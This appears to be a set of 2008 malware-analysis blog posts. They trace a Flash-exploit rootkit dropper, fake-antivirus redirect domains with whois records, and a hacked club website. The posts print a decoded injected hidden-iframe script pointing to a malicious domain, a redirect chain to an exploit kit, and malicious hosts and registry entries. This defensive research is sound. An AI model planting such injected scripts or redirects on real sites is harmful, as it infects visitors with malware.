Registrant:
N/A
Javier Vega ()
Tegelbacken 7, Box 193
Stockholm
Stockholmslän,10123
SE
Tel. +46.84123433

Creation Date: 24-Jun-2007
Expiration Date: 24-Jun-2009

Domain servers in listed order:
managedns4.estboxes.com
managedns3.estboxes.com
managedns2.estboxes.com
managedns1.estboxes.com

Administrative Contact:
N/A
Javier Vega ()
Tegelbacken 7, Box 193
Stockholm
Stockholmslän,10123
SE
Tel. +46.84123433

Technical Contact:
N/A
Javier Vega ()
Tegelbacken 7, Box 193
Stockholm
Stockholmslän,10123
SE
Tel. +46.84123433

Billing Contact:
N/A
Javier Vega ()
Tegelbacken 7, Box 193
Stockholm
Stockholmslän,10123
SE
Tel. +46.84123433

Websites.

1. Blobuz.com
2. Index-of-mp3.org
3. Ipodcontent.net
4. Medium-orient.com
5. Mostpopulardrugs.com
6. Mywritingblog.org
7. Nkeil.com
8. Pl4a.com
9. Reflective-essay.info
10. Servedad.net
11. Trafficswitch.com
12. Advancedbill.net

<h4></h4>
I can only wish one thing after you'll see this one, that you hate Flash and prevent it from running. That's about all I have to say on the whole Flash story.

It all starts again with one of those nifty small Flash files which contain a link to an executable. I will not focus on the swf file itself, we saw them enough lately.

First a small note, due to the complexity of the screenshots I had to run this bugger twice, so you will notice a difference in the driver name because it's random.

So what must happen, will happen ... x.exe is downloaded and executed on our system. It wants to install a driver /service (random name), starts an instance of Internet Explorer, writes into the memory address of Internet Explorer and x.exe is deleted.

That's only the tip of the iceberg because behind the scene there's much more going on.

Here we see x.exe dropping the driver into the root, usual c:\

The driver is loaded into the System process.

The corresponding service is created.

CODE

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\11828ef8135c9f0a]
"Type"=dword:00000001
"Start"=dword:00000003
"ErrorControl"=dword:00000000
"ImagePath"=str(2):"\??\C:\11828ef8135c9f0a.dat"
"DisplayName"="11828ef8135c9f0a"

The driver is marked for deletion by x.exe and we will thus not be able to find C:\11828ef8135c9f0a.dat on our HDD.

Now take a seat as here comes the fun. I first didn't fully understand the meaning of everything seen in the picture below but believe me it will become cristal clear, especially after a reboot. We notice that x.exe messes around with explorer.exe and writes something directly to the HDD - Device\Harddisk\DR0 - at a certain offset. When we look at the size of the bytes written, we notice it's exactly the same size as explorer.exe.

In meanwhile anything that hooks SSDT will be kicked out ... antivirus, firewall, hips ... so you may say ciao to your protections. A hidden instance of Internet Explorer is started by x.exe and 2 unknown modules will appear in the memory address space of IE. A text file is then requested from a server which contains a lists of files to download. First file on the list is the dropper update.

At this stage our rootkit scan looks as follows.

QUOTE

GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-08-10 01:19:07
Windows 5.1.2600 Service Pack 2

---- Kernel code sections - GMER 1.0.14 ----

? C:\11828ef8135c9f0a.dat The system cannot find the file specified. !

---- User code sections - GMER 1.0.14 ----

.text C:\WINDOWS\Explorer.EXE[1252] Explorer.EXE 0101E260 4 Bytes [ E3, 38, FF, FF ]
.rsrc C:\WINDOWS\Explorer.EXE[1252] C:\WINDOWS\Explorer.EXE section is executable [0x01048000, 0xB2278, 0xE0000060]

---- EOF - GMER 1.0.14 ----

A strange thing happend when I fired up gmer, windows found some new hardware and wanted to reboot.

I was curious how the rootkit scan would look after so I did reboot the computer. I found out that a chkdsk scan was scheduled at reboot, scan I did cancel. When arriving on the desktop, Explorer.exe wanted Internet access ...

Uhmm, curious as this usually does not happen. Guess what ... explorer.exe has been replaced, the Device\Harddisk\DR0 mystery is solved. Same list of files are again downloaded. Nothing prevents the bad guys from changing the list of files to download btw. Rootkit scan now looks like this:

QUOTE

GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-08-10 03:03:46
Windows 5.1.2600 Service Pack 2

---- User code sections - GMER 1.0.14 ----

.rsrc C:\WINDOWS\Explorer.EXE[1224] C:\WINDOWS\Explorer.EXE section is executable [0x01048000, 0xB2278, 0xE0000060]

---- EOF - GMER 1.0.14 ----

Still enjoying Flash ?

<h4></h4>
Filename: i115.swf

File size: 1398 bytes
MD5...: 480deb1e22065768cacc31969520afdd
SHA1..: 1f3297f1360ea9e8694e1d42a8262e3fde493808
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE

File i115.swf received on 08.09.2008 23:20:18 (CET)
AhnLab-V3 2008.8.9.0 2008.08.08 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.19 2008.08.09 EXP/Flash.Gen
Authentium 5.1.0.4 2008.08.09 -
Avast 4.8.1195.0 2008.08.09 SWF:CVE-2007-0071
AVG 8.0.0.156 2008.08.09 -
BitDefender 7.2 2008.08.09 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.08.08 SWF.Exploit
ClamAV 0.93.1 2008.08.09 -
DrWeb 4.44.0.09170 2008.08.09 Exploit.SWF.73
eSafe 7.0.17.0 2008.08.07 -
eTrust-Vet 31.6.6019 2008.08.08 -
Ewido 4.0 2008.08.09 -
F-Prot 4.4.4.56 2008.08.08 -
F-Secure 7.60.13501.0 2008.08.09 -
Fortinet 3.14.0.0 2008.08.09 -
GData 2.0.7306.1023 2008.08.09 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.08.09 -
K7AntiVirus 7.10.408 2008.08.09 -
Kaspersky 7.0.0.125 2008.08.09 -
McAfee 5357 2008.08.08 -
Microsoft 1.3807 2008.08.09 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3342 2008.08.09 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.08.08 -
Panda 9.0.0.4 2008.08.09 -
PCTools 4.4.2.0 2008.08.09 -
Prevx1 V2 2008.08.09 -
Rising 20.56.41.00 2008.08.08 -
Sophos 4.32.0 2008.08.09 Exp/SWFScene-A
Sunbelt 3.1.1538.1 2008.08.09 -
Symantec 10 2008.08.09 Bloodhound.Exploit.193
TheHacker 6.2.96.395 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.08 -
VBA32 3.12.8.3 2008.08.09 -
ViRobot 2008.8.8.1329 2008.08.08 -
VirusBuster 4.5.11.0 2008.08.09 -
Webwasher-Gateway 6.6.2 2008.08.09 Exploit.Flash.Gen

______________________________

Filename: x.exe

File size: 15360 bytes
MD5...: e2331372153e16ab9bb75b558d9b3cef
SHA1..: 5ffe8c1982ad49af5cc8a3e1e1dc8a2f8ff17f46
SHA256: 477d403e314b96ddeb8a62530b3dd03c34693ac63ba198e24a38bd7dd2b1db36
PEiD..: UPX 2.90 [LZMA]

QUOTE

File x.exe received on 08.10.2008 03:09:40 (CET)
AhnLab-V3 2008.8.9.0 2008.08.08 -
AntiVir 7.8.1.19 2008.08.09 TR/Spy.Gen
Authentium 5.1.0.4 2008.08.10 W32/Heuristic-KPP!Eldorado
Avast 4.8.1195.0 2008.08.09 Win32:Spyware-gen
AVG 8.0.0.156 2008.08.09 Injector.R
BitDefender 7.2 2008.08.10 -
CAT-QuickHeal 9.50 2008.08.08 -
ClamAV 0.93.1 2008.08.09 -
DrWeb 4.44.0.09170 2008.08.09 Trojan.Inject.origin
eSafe 7.0.17.0 2008.08.07 Suspicious File
eTrust-Vet 31.6.6021 2008.08.08 -
Ewido 4.0 2008.08.09 -
F-Prot 4.4.4.56 2008.08.10 W32/Heuristic-KPP!Eldorado
F-Secure 7.60.13501.0 2008.08.09 -
Fortinet 3.14.0.0 2008.08.09 W32/BIW!tr.dldr
GData 2.0.7306.1023 2008.08.10 Win32:Spyware-gen
Ikarus T3.1.1.34.0 2008.08.10 Virus.Win32.Spyware
K7AntiVirus 7.10.408 2008.08.09 -
Kaspersky 7.0.0.125 2008.08.10 -
McAfee 5357 2008.08.08 Downloader-BIW
Microsoft 1.3807 2008.08.09 -
NOD32v2 3342 2008.08.09 a variant of Win32/Inject.NBE
Norman 5.80.02 2008.08.08 W32/DLoader.IUIC
Panda 9.0.0.4 2008.08.09 Generic Malware
PCTools 4.4.2.0 2008.08.09 -
Prevx1 V2 2008.08.10 -
Rising 20.56.41.00 2008.08.08 -
Sophos 4.32.0 2008.08.10 Mal/Heuri-D
Sunbelt 3.1.1538.1 2008.08.09 RiskTool.Win32.ProcessPatcher.Sml!cobra (v)
Symantec 10 2008.08.10 Trojan Horse
TheHacker 6.2.96.395 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.08 PAK_Generic.001
VBA32 3.12.8.3 2008.08.09 -
ViRobot 2008.8.8.1329 2008.08.08 -
VirusBuster 4.5.11.0 2008.08.09 -
Webwasher-Gateway 6.6.2 2008.08.09 Trojan.Spy.Gen

______________________________

Filename: 9bf4f690dc4ecb2b.dat

File size: 5664 bytes
MD5...: 11bdfd641ccef3d04c893da95488ac2f
SHA1..: a3644956e6f5488bf7804ea8c88650d7d52f02cf
SHA256: 0eb647518e4767074f9f730eab196c6f842d09bd9a461128bd26eceb7606f7e3
PEiD..: -

QUOTE

File 9bf4f690dc4ecb2b.dat received on 08.09.2008 23:06:48 (CET)
AhnLab-V3 2008.8.9.0 2008.08.08 -
AntiVir 7.8.1.19 2008.08.09 -
Authentium 5.1.0.4 2008.08.09 -
Avast 4.8.1195.0 2008.08.09 -
AVG 8.0.0.156 2008.08.09 -
BitDefender 7.2 2008.08.09 -
CAT-QuickHeal 9.50 2008.08.08 -
ClamAV 0.93.1 2008.08.09 -
DrWeb 4.44.0.09170 2008.08.09 -
eSafe 7.0.17.0 2008.08.07 -
eTrust-Vet 31.6.6021 2008.08.08 -
Ewido 4.0 2008.08.09 -
F-Prot 4.4.4.56 2008.08.08 -
F-Secure 7.60.13501.0 2008.08.09 -
Fortinet 3.14.0.0 2008.08.09 -
GData 2.0.7306.1023 2008.08.09 -
Ikarus T3.1.1.34.0 2008.08.09 -
K7AntiVirus 7.10.408 2008.08.09 -
Kaspersky 7.0.0.125 2008.08.09 -
McAfee 5357 2008.08.08 -
Microsoft 1.3807 2008.08.09 VirTool:WinNT/Rootkitdrv.AQ
NOD32v2 3342 2008.08.09 -
Norman 5.80.02 2008.08.08 -
Panda 9.0.0.4 2008.08.09 -
PCTools 4.4.2.0 2008.08.09 -
Prevx1 V2 2008.08.09 -
Rising 20.56.41.00 2008.08.08 -
Sophos 4.32.0 2008.08.09 -
Sunbelt 3.1.1538.1 2008.08.09 -
Symantec 10 2008.08.09 -
TheHacker 6.2.96.395 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.08 -
VBA32 3.12.8.3 2008.08.09 -
ViRobot 2008.8.8.1329 2008.08.08 -
VirusBuster 4.5.11.0 2008.08.09 -
Webwasher-Gateway 6.6.2 2008.08.09 -

______________________________

Filename: explorer.exe

File size: 1032192 bytes
MD5...: 925b0209b90b9c7fbf76f4d11c1e1316
SHA1..: 6b19f040213cd1b68d1b26858c2c385eb2788592
SHA256: ea5f720c18d244eec3a7ea5acbd034accb00e6cbdddad7486421553e79204241
PEiD..: -

QUOTE

File explorer.exe received on 08.10.2008 01:55:39
AhnLab-V3 2008.8.9.0 2008.08.08 -
AntiVir 7.8.1.19 2008.08.09 -
Authentium 5.1.0.4 2008.08.09 -
Avast 4.8.1195.0 2008.08.09 -
AVG 8.0.0.156 2008.08.09 -
BitDefender 7.2 2008.08.10 -
CAT-QuickHeal 9.50 2008.08.08 -
ClamAV 0.93.1 2008.08.09 -
DrWeb 4.44.0.09170 2008.08.09 -
eSafe 7.0.17.0 2008.08.07 -
eTrust-Vet 31.6.6021 2008.08.08 -
Ewido 4.0 2008.08.09 -
F-Prot 4.4.4.56 2008.08.08 -
F-Secure 7.60.13501.0 2008.08.09 -
Fortinet 3.14.0.0 2008.08.09 -
GData 2.0.7306.1023 2008.08.10 -
Ikarus T3.1.1.34.0 2008.08.10 Trojan.Win32.VB.avg
K7AntiVirus 7.10.408 2008.08.09 -
Kaspersky 7.0.0.125 2008.08.10 -
McAfee 5357 2008.08.08 W32/ExpPatch
Microsoft 1.3807 2008.08.09 -
NOD32v2 3342 2008.08.09 -
Norman 5.80.02 2008.08.08 -
Panda 9.0.0.4 2008.08.09 -
PCTools 4.4.2.0 2008.08.09 -
Prevx1 V2 2008.08.10 -
Rising 20.56.41.00 2008.08.08 -
Sophos 4.32.0 2008.08.09 -
Sunbelt 3.1.1538.1 2008.08.09 -
Symantec 10 2008.08.10 -
TheHacker 6.2.96.395 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.08 -
VBA32 3.12.8.3 2008.08.09 -
ViRobot 2008.8.8.1329 2008.08.08 -
VirusBuster 4.5.11.0 2008.08.09 -
Webwasher-Gateway 6.6.2 2008.08.09 Win32.Malware.gen (suspicious)

I haven't scanned the downloaded files yet. I'll try to post some information about them later on.

Some additional details about x.exe can be found in this writeup from Symantec.

Scan of the downloaded files.

--------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER 7 REPORT
Sunday, August 10, 2008
Operating System: Microsoft Windows XP Professional Service Pack 2 (build 2600)
Kaspersky Online Scanner 7 version: 7.0.25.0
Program database last update: Sunday, August 10, 2008 17:06:19
Records in database: 1079166
--------------------------------------------------------------------------------

Scan settings:
Scan using the following database: extended
Scan archives: yes
Scan mail databases: yes

Scan area - Folder:
C:\Files

Scan statistics:
Files scanned: 31
Threat name: 26
Infected objects: 29
Suspicious objects: 0
Duration of the scan: 00:00:05

File name / Threat name
C:\Files\7.exe Infected: Trojan-Downloader.Win32.Aqtemp.an
C:\Files\8.exe Infected: Trojan.Win32.Agent.ybf
C:\Files\9.exe Infected: Trojan-GameThief.Win32.WOW.bqs
C:\Files\a.exe Infected: Virus.Win32.Parite.b
C:\Files\a1.exe Infected: Trojan-GameThief.Win32.OnLineGames.spgw
C:\Files\a10.exe Infected: Trojan-GameThief.Win32.OnLineGames.snrt
C:\Files\a11.exe Infected: Trojan-GameThief.Win32.OnLineGames.spdu
C:\Files\a12.exe Infected: Trojan-GameThief.Win32.OnLineGames.spix
C:\Files\a13.exe Infected: Trojan-GameThief.Win32.OnLineGames.sood
C:\Files\a14.exe Infected: Trojan-GameThief.Win32.OnLineGames.spgw
C:\Files\a15.exe Infected: Trojan-GameThief.Win32.OnLineGames.snse
C:\Files\a16.exe Infected: Trojan-GameThief.Win32.OnLineGames.spgy
C:\Files\a17.exe Infected: Trojan-GameThief.Win32.OnLineGames.soof
C:\Files\a18.exe Infected: Trojan-GameThief.Win32.OnLineGames.sotx
C:\Files\a19.exe Infected: Trojan-GameThief.Win32.OnLineGames.spgx
C:\Files\a2.exe Infected: Trojan-GameThief.Win32.OnLineGames.bkln
C:\Files\a20.exe Infected: Trojan-PSW.Win32.Agent.nr
C:\Files\a21.exe Infected: Trojan-GameThief.Win32.OnLineGames.snsi
C:\Files\a22.exe Infected: Trojan-GameThief.Win32.OnLineGames.sjcq
C:\Files\a23.exe Infected: Trojan-GameThief.Win32.OnLineGames.snsj
C:\Files\a25.exe Infected: Trojan-GameThief.Win32.OnLineGames.shhw
C:\Files\a3.exe Infected: Trojan-GameThief.Win32.OnLineGames.shhv
C:\Files\a4.exe Infected: Trojan-GameThief.Win32.OnLineGames.spgw
C:\Files\a5.exe Infected: Trojan-GameThief.Win32.OnLineGames.snsa
C:\Files\a6.exe Infected: Trojan-GameThief.Win32.OnLineGames.sndp
C:\Files\a7.exe Infected: Trojan-GameThief.Win32.OnLineGames.sooh
C:\Files\a9.exe Infected: Trojan-GameThief.Win32.OnLineGames.sjcq
C:\Files\c2.exe Infected: not-a-virus:AdWare.Win32.BHO.bqt
C:\Files\c3.exe Infected: not-a-virus:AdWare.Win32.Cinmus.pba

Missing files scanned at Virustotal - Kaspersky Results.

C:\Files\a8.exe - Trojan-GameThief.Win32.OnLineGames.spdn
C:\Files\a24.exe - Trojan-GameThief.Win32.OnLineGames.snnd

Short description of the most dangerous.

Virus.Win32.Parite.b searches for Win32 EXE PE files with .scr and .exe extensions on all logical drives of computer, and also in shared resources of local network, and infects them.

Trojan-GameThief.Win32.OnLineGames is a threat that attempts to steal vital information from the user with regards to online gaming activity and is capable of connecting to a remote site to download possible updates of its application.

Can I protect myself from these adverts?

<h4></h4>
adtds.trackads.net / adtds2.promoplexer.com have activated a new domain: bestpictures2.com

bestpictures2.com/soft.php?aid=0593&d=3&product=XPA

Depending on the parameters people will get redirected to different fake online scanners. I got redirected to

windows-scanner.com/2009/1/freescan.php?aid=880593

bestpictures2.com - 84.16.227.62

Website Title: None given.
ICANN Registrar: BIZCN.COM, INC.
Created: 2008-07-30
Expires: 2009-07-30
Updated: 2008-07-31
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 825 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.bizcn.com

IP Location - Berlin - Berlin - Netdirekt E.k
Dedicated Hosting: bestpictures2.com is hosted on a dedicated server.

Whois Record
Domain name: bestpictures2.com

Registrant Contact:
DomainsReg, Inc.
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Administrative Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Technical Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Billing Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn
______________________________

windows-scanner.com - 84.16.227.62

Website Title: Antivirus 2009 - Official website
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-01
Expires: 2009-07-01
Updated: 2008-07-01
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 825 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

Server Type: lighttpd
IP Location - Berlin - Berlin - Netdirekt E.k
Dedicated Hosting: windows-scanner.com is hosted on a dedicated server.

Whois Record
Domain Name: WINDOWS-SCANNER.COM

Creation Date: 01-Jul-2008
Expiration Date: 01-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
N/A
Victor Temchenko ()
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +38.0638550739

Administrative Contact:
N/A
Victor Temchenko ()
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +38.0638550739

Technical Contact:
N/A
Victor Temchenko ()
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +38.0638550739

Billing Contact:
N/A
Victor Temchenko ()
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +38.0638550739

<h4></h4>
WawaSeb alerted me on this case. A female basketball club website - www.rebondottignies.be - kind of hijacked by our Nancy Drew malvertizement. I did mention her "Hijacking In Style" a couple of days ago.

So what do we have here? A nifty script on the homepage ... the owner of the site has been a victim of hacking.

Decoded:

CODE

<script Language='Javascript'>document.write(unescape
('<iframe src="http://PLJ.dAgOTh.iN/" width=0 height=0></iframe>'));</script>

Let's follow the moves ...

CODE

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.rebondottignies.be/
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: plj.dagoth.in
Connection: Keep-Alive

HTTP/1.1 302 Redirect
Content-Length: 165
Content-Type: text/html
Location: http://mn96.dns.gendistr.info/qualitytest/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 11 Aug 2008 19:01:29 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://mn96.dns.gendistr.info/qualitytest/">here</a></body>

CODE

GET /qualitytest/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.rebondottignies.be/
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Host: mn96.dns.gendistr.info

HTTP/1.1 302 Found
Date: Mon, 11 Aug 2008 19:00:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Location: http://td.weblode.biz/ts/in.cgi?eadle
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

CODE

GET /ts/in.cgi?eadle HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.rebondottignies.be/
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Host: td.weblode.biz

HTTP/1.1 302 Found
Date: Mon, 11 Aug 2008 19:07:29 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.7e-p1 DAV/2
Location: http://td.weblode.biz/tds/in.cgi?3&group=1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://td.weblode.biz/tds/in.cgi?3&group=1'">
</head>
<body>
document moved <a href="http://td.weblode.biz/tds/in.cgi?3&group=1">here</a>
</body>
</html>

CODE

GET /tds/in.cgi?3&group=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.rebondottignies.be/
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Cookie: SL_eadle_0000=_1_; TSUSER=eadle
Connection: Keep-Alive
Host: td.weblode.biz

HTTP/1.1 302 Found
Date: Mon, 11 Aug 2008 19:07:29 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.7e-p1 DAV/2
Location: http://dergamend.com/roy/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://dergamend.com/roy/'">
</head>
<body>
document moved <a href="http://dergamend.com/roy/">here</a>
</body>
</html>

Whoops, here we have an obfuscated script to decode.

It's a very long script. OS, browser, Flash version are tested and some exploits get fired up.

• MS06-014
• MS03-011
• MS05-001
• Flash

Below is a snip-it of the decoded script relative to Flash content of course.

Malicious SWF file.

Payload.

Filename: Tempmbroit.exe

File size: 129536 bytes
MD5...: 695875f95fbf46cd014c8d1c05faa236
SHA1..: 882c20b5968651158b510a1ab844a91ca62bff30
SHA256: 0dceaacb4af818a2108d13862b191f3eb203d09261f29aabdc7259a90d18d1c4
PEiD..: -

QUOTE

File Tempmbroit.exe received on 08.12.2008 02:14:17 (CET)
AhnLab-V3 2008.8.12.0 2008.08.11 -
AntiVir 7.8.1.19 2008.08.11 TR/Dldr.Small.aatc
Authentium 5.1.0.4 2008.08.12 -
Avast 4.8.1195.0 2008.08.11 -
AVG 8.0.0.156 2008.08.11 -
BitDefender 7.2 2008.08.12 -
CAT-QuickHeal 9.50 2008.08.11 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.12 -
DrWeb 4.44.0.09170 2008.08.11 -
eSafe 7.0.17.0 2008.08.11 Suspicious File
eTrust-Vet 31.6.6021 2008.08.08 -
Ewido 4.0 2008.08.11 -
F-Prot 4.4.4.56 2008.08.11 -
F-Secure 7.60.13501.0 2008.08.12 Trojan-Downloader.Win32.Small.aatc
Fortinet 3.14.0.0 2008.08.11 -
GData 2.0.7306.1023 2008.08.12 Trojan-Downloader.Win32.Small.aatc
Ikarus T3.1.1.34.0 2008.08.12 -
K7AntiVirus 7.10.411 2008.08.11 -
Kaspersky 7.0.0.125 2008.08.12 Trojan-Downloader.Win32.Small.aatc
McAfee 5358 2008.08.11 -
Microsoft 1.3807 2008.08.12 TrojanDownloader:Win32/Renos.gen!AQ
NOD32v2 3347 2008.08.11 a variant of Win32/TrojanDownloader.FakeAlert.FZ
Norman 5.80.02 2008.08.11 -
Panda 9.0.0.4 2008.08.11 -
PCTools 4.4.2.0 2008.08.11 -
Rising 20.57.02.00 2008.08.11 -
Sophos 4.32.0 2008.08.12 Mal/EncPk-CZ
Sunbelt 3.1.1538.1 2008.08.09 -
Symantec 10 2008.08.12 -
TheHacker 6.2.96.395 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.11 -
VBA32 3.12.8.3 2008.08.11 -
ViRobot 2008.8.11.1331 2008.08.11 -
VirusBuster 4.5.11.0 2008.08.11 -
Webwasher-Gateway 6.6.2 2008.08.12 Trojan.Dldr.Small.aatc

Note: This file is usually known to download and install fake antivirus solutions. Has anti VM & Sandbox features build in.

<h4></h4>
Here we go again, i115.swf one of those nifty little Flash files will download a file called SW.exe from the server. The SW.exe will drop msgmr.dll into the program files\messenger folder and will load the dll with the help of rundll32.exe

About 5 minutes later, rundll32.exe will start a hidden instance of Internet Explorer.

20:01:43 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\rundll32.exe" [468]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]

A very small gif file will be downloaded. moon.gif isn't a real image, it's a text file which contains a list of additional files to download. All will "pretend" to be gif files but they ain't.

The last 3 files are the worst, one is a self update and 2 of them will install drivers. d.gif will also write into the memory address space of explorer.exe.

Let's details those drivers a little bit.

b.gif

• service: 1120561ErrorControl - random numbers + ErrorControl
• file: %temp%\dump_wmimmc.sys - will be deleted once loaded
• file: %windows%\Downloaded Program Files\ThunderAdvise.dll

d.gif

• file: %windows%\linkinfo.dll
• file: %system%\drivers\IsDrv122.sys - mimics IceSword driver
• service: eth8023
• file: %system%\drivers\eth8023.sys

Information about hardware will be posted back and a final update will be performed. This is chinese stuff, it's very complex and often difficult to remove from a computer.

There is also a new key created under HKEY_CURRENT_USER called avs which contains a lot of settings related to OS settings.

Visible signs.

O2 - BHO: ThunderAdvise - {97421D0D-E07F-40DF-8F07-99597B9585AD} - C:\WINDOWS\Downloaded Program Files\ThunderAdvise.dll
O4 - HKLM\..\Run: [3PMmUpdate] rundll32 "C:\WINDOWS\Update.dll",Main
O20 - AppInit_DLLs: mssetd.dll lenowos.dll sunesn.dll esceps.dll cmonos.dll offscrl.dll cxhole.dll therbrek.dll rmbsony.dll manleu.dll wdhotem.dll jolinos.dll keyiftp.dll baccops.dll xpsbos.dll crtnumo.dll dickus.dll zlcdps.dll
O21 - SSODL: msnmsg - {DA191DE0-AA86-4ED0-4B87-293D48B2AE99} - C:\Program Files\Messenger\msgmr.dll
O21 - SSODL: sysocmgr - {DA1DE019-A6A8-ED40-4B87-248B2A93DE99} - C:\WINDOWS\sysocmgr.dll
O21 - SSODL: ThunderAdvise - {97421D0D-E07F-40DF-8F07-99597B9585AD} - C:\WINDOWS\Downloaded Program Files\ThunderAdvise.dll

The following entries may be present in the HOSTS file. (I did not always get them during different runs)

O1 - Hosts: 202.165.102.205 972.aksjd11.com
O1 - Hosts: 202.165.102.205 w3og.cn
O1 - Hosts: 203.208.35.100 qazc.fourtw.cn
O1 - Hosts: 203.208.35.100 www.aujoy.cn
O1 - Hosts: 203.208.35.101 www.hao601.cn
O1 - Hosts: 203.208.35.101 www.psp476.cn
O1 - Hosts: 72.14.235.99 222.1212l112.net
O1 - Hosts: 72.14.235.99 444.1212l112.netn
O1 - Hosts: 72.14.235.99 555.1212l112.net
O1 - Hosts: 72.14.235.99 111.1212l112.net
O1 - Hosts: 65.55.21.250 111.3243l24.com
O1 - Hosts: 65.55.21.250 222.3243l24.com
O1 - Hosts: 65.55.21.250 333.3243l24.com
O1 - Hosts: 125.64.8.112 kao2.gmwo03.com
O1 - Hosts: 125.64.8.112 kao.gmwo06.com
O1 - Hosts: 125.64.8.112 444.gmwo07.com
O1 - Hosts: 116.252.185.15 ru.update365.us
O1 - Hosts: 116.252.185.15 ad.update365.us
O1 - Hosts: 207.46.232.182 popmails.net
O1 - Hosts: 203.208.37.99 3.goodhh.com
O1 - Hosts: 220.181.37.55 down.rwixr.com
O1 - Hosts: 160.79.42.52 www.xdj2008.com
O1 - Hosts: 63.175.76.152 www.revtr.cn
O1 - Hosts: 219.133.40.91 qq.ljsll.com
O1 - Hosts: 203.208.35.102 www.aassccwe.cn
O1 - Hosts: 209.132.177.50 973.aksjd11.com
O1 - Hosts: 209.132.177.50 974.aksjd11.com
O1 - Hosts: 209.132.177.50 971.aksjd11.com
O1 - Hosts: 209.132.177.50 975.aksjd11.com
O1 - Hosts: 72.14.235.104 user1.12-39.net
O1 - Hosts: 72.14.235.147 www.infomt.net
O1 - Hosts: 192.150.18.101 ata1.sysions.net
O1 - Hosts: 192.150.18.101 ata2.sysions.net
O1 - Hosts: 192.150.18.101 ata3.sysions.net
O1 - Hosts: 192.150.18.101 ata4.sysions.net
O1 - Hosts: 193.120.42.226 8nnnnn99.cn
O1 - Hosts: 24.39.54.34 www.haoaoao.cn

Detection by Kaspersky.

Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\10.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spif C:\Documents and Settings\KLY\Local Settings\Temp\11.gif
